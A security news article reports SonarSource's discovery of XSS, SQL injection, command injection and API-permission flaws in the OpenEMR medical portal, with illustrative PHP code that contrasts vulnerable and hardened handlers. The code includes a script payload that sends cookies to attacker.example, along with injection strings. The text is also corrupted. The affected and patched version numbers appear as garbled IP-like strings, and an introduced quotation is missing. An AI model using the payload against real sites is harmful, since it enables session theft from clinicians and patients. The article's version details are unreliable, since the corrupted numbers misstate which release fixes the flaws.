Researchers have found numerous security vulnerabilities in the OpenEMR software. Exploiting them could allow an attacker to compromise the medical portal and gain access to sensitive patient records.
Multiple OpenEMR Vulnerabilities Discovered
Researchers from SonarSource discovered multiple different security vulnerabilities while analyzing OpenEMR software.
OpenEMR is an open-source medical practice management application. Medical facilities around the world use it to maintain patient data and health records, and to let patients communicate with physicians and schedule appointments.
Specifically, the researchers found four different security bugs in the software: a command injection vulnerability, a persistent cross-site scripting (XSS) flaw, insecure API permissions, and an SQL injection flaw.
For a successful attack, an adversary would first inject malicious JavaScript into the Patient Portal on the user-facing side. As described in the post,
Execution of that malicious JavaScript in a victim's browser could then be chained with the remaining backend bugs to take over the entire server and steal patients' data.
The following video demonstrates a successful attack scenario.
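To make the four bug classes above concrete, the following PHP snippets are an added illustration, not code from OpenEMR or from the SonarSource write-up. Each shows a hypothetical patient-portal handler in its vulnerable form beside a hardened one; all function, table, path and role names are invented for the example.

```php
<?php
// Illustrative only: these are NOT OpenEMR's functions. Each pair shows one bug
// class named in the article in an invented patient-portal message feature.

// --- 1. Persistent (stored) XSS -------------------------------------------
// Vulnerable: text a patient saved is echoed raw into HTML later, so a stored
// <script> runs in every staff member's browser that views the message.
function render_message_vulnerable(string $body): string {
    return "<div class=\"msg\">$body</div>";
}
// Hardened: encode on output for the HTML context the data lands in.
function render_message(string $body): string {
    return '<div class="msg">'
        . htmlspecialchars($body, ENT_QUOTES | ENT_HTML5, 'UTF-8')
        . '</div>';
}

// --- 2. SQL injection -----------------------------------------------------
// Vulnerable: the id is concatenated into the query; "1 OR 1=1" returns every row.
function load_message_vulnerable(PDO $db, string $id): array {
    return $db->query("SELECT body FROM portal_messages WHERE id = $id")->fetchAll();
}
// Hardened: parameterised query; data never becomes part of the SQL grammar.
function load_message(PDO $db, string $id): array {
    $stmt = $db->prepare('SELECT body FROM portal_messages WHERE id = :id');
    $stmt->execute([':id' => (int) $id]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// --- 3. Command injection -------------------------------------------------
// Vulnerable: a request-controlled filename is interpolated into a shell
// command; "x; id" runs an arbitrary command as the web server user.
function convert_document_vulnerable(string $name): string {
    return (string) shell_exec("convert /var/portal/uploads/$name /var/portal/pdf/$name.pdf");
}
// Hardened: allow-list the name, then quote every argument anyway.
function convert_document(string $name): string {
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        throw new InvalidArgumentException('bad document name');
    }
    $src = escapeshellarg("/var/portal/uploads/$name");
    $dst = escapeshellarg("/var/portal/pdf/$name.pdf");
    return (string) shell_exec("convert $src $dst");
}

// --- 4. Insecure API permissions ------------------------------------------
// Stand-in for a privileged operation (constructed output, no real export).
function export_all_records(): string {
    return '{"records":["...all patients..."]}';
}
// Vulnerable: any authenticated session, including a patient-portal one,
// can call a staff-only endpoint because the role is only checked in the UI.
function api_export_records_vulnerable(array $session): string {
    return export_all_records();
}
// Hardened: enforce the role server-side on every request.
function api_export_records(array $session): string {
    if (($session['role'] ?? '') !== 'clinician') {
        http_response_code(403);
        return '{"error":"forbidden"}';
    }
    return export_all_records();
}

// Demonstration with a constructed payload (case 1 needs no database or shell).
$payload = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';
echo render_message_vulnerable($payload), PHP_EOL; // script tag survives intact
echo render_message($payload), PHP_EOL;            // &lt;script&gt;... is inert text
echo api_export_records(['role' => 'patient']), PHP_EOL; // {"error":"forbidden"}
```

The chain the article describes maps onto these pieces: the stored XSS (1) gives the attacker code execution in a privileged user's browser, and that browser session is then used to reach the backend bugs (2 to 4) that the attacker could not call directly as a patient.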
Patch Rolled Out
The vulnerabilities primarily affected OpenEMR 220.127.116.11. Upon discovering the bugs, the researchers reached out to the OpenEMR maintainers, who addressed all of them with the release of version 18.104.22.168.
Users can find and download the patches, which the project released in August 2020, on the OpenEMR web page.
The researchers held back disclosure until now to give most users time to install the patches.
Since the bugs are now public, all users who have not already done so must update their systems to the patched OpenEMR version as quickly as possible.